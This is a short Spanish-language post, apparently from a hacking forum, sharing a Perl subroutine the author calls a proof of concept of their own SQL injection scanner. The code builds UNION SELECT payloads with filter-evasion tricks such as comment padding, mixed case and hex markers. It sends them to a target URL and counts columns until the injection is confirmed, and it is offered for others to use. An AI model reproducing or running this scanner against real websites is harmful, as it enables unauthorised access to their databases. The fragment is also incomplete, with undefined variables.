es un "PoC" de mi propia SQli Scanner espero que les sea de utilidad ^^!
sub sql_scann {
#############################################
# SQL union select (Boolean)
#
# $columns_count = "30";
# $end = "+--+";
# $un = "/**/";
# $num_url = "5";
print "\n[*] Escaneando Path...\n"; $table_schema;
$union = $un ."and" . $un . "1=0" . $un . "UniOn" . $un . "SeLect" . $un;
$i=1; while ($i<=$columns_count)
{
if ($i eq 1) {$cont1.= $i} else {$cont1.=',' . $i} $hex = "99999" . $i ."99999";
if ($i eq 1) {$cont2.="concat(0x62346e7a306b,$hex)";}
else {$cont2.=',' . "concat(0x62346e7a306b,$hex)";}
$path = $url . $num_url . $union . $cont2;
my $request = $browser->get($path . $end);
my $content = $request->content;
if ($content =~ m/b4nz0k99999(\d+)99999/)
{ print "[*] Web Vulnerada en la Columna [$1]\n[*] CoLumna en el Numero [" . $i . "]\n";
$vulnerado = "Si"; $num_columns = $i; $inject_columns = $1;
last;
} $i++;
} # print "$cont1\n";
}
